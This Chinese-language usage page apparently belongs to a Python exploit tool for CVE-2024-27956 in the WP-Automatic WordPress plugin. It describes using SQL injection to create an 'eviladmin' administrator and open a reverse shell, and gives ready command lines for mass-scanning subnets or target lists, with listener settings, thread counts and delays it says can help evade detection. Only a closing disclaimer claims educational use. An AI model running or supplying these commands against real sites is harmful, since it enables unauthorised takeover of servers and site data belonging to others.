WordPress Auto Admin Account and Reverse Shell cve 2024 27956
1.0.0
此Python脚本自动化了在WordPress站点中创建新的管理员帐户并在目标服务器上执行反向外壳的过程。它利用WP-Automation插件的CSV注入漏洞在WordPress数据库上执行SQL查询并获得管理访问。
扫描子网:如果要扫描一个子网中的易受伤害的WordPress安装,则可以使用--subnet选项。例如:
python wp-automatic-exploit.py --subnet 192.168.1.0/24 --lhost 127.0.0.1 --lport 1414 --threads 10 --delay 1.0
此命令将扫描具有弱势WP自动插件的WordPress网站的192.168.1.0/24子网,并尝试使用提供的侦听器设置来利用它们。
自定义延迟:可以使用--delay选项调整请求之间的延迟。较高的延迟可能有助于避免检测或限制限制,而较低的延迟可以加快剥削过程。例如:
python wp-automatic-exploit.py --targets targets.txt --lhost 127.0.0.1 --lport 1414 --threads 10 --delay 2.5
此命令将在请求之间使用2.5秒的延迟。
使用远程侦听器:如果您的侦听器是在远程计算机上设置的,则可以使用--lhost and --lport选项指定其IP地址和端口。例如:
python wp-automatic-exploit.py --targets targets.txt --lhost 192.168.1.100 --lport 8080 --threads 10 --delay 1.0
此命令将在192.168.1.100:8080连接回侦听器。
增加线程的数量:您可以将脚本使用的线程数与the --threads选项增加。这可以加快剥削过程,但也可能会增加检测的可能性或引起限制速率的问题。例如:
python wp-automatic-exploit.py --targets targets.txt --lhost 127.0.0.1 --lport 1414 --threads 20 --delay 1.0
此命令将使用20个线程进行开发。
requests库(通过pip install requests安装)domain变量。eviladmin的新管理用户,设置密码并分配管理特权。注意:在运行此脚本之前,请确保您拥有适当的授权和权限,因为如果被滥用,它可能会导致安全漏洞和法律后果。
此脚本仅用于教育和测试目的。作者对此脚本的任何未经授权或非法使用不承担任何责任。使用它自己的风险。